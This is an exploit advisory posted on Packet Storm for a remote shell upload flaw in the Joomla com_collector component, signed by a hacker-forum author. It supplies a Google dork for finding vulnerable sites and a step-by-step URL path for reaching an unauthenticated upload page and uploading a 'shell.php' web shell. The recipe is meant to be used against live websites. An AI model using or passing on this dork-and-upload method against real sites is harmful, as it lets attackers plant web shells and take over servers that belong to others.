The Joomla Collector component suffers from a remote shell upload vulnerability.
1f428d79159db8e42cd96fdac387c73fc558a4ff2f664a62900a19d970b4bf9d# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013
# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP
# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
1- Google dork: [inurl:index.php?option=com_collector]
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
upload ur shell as : shell.php
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.
#2013
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed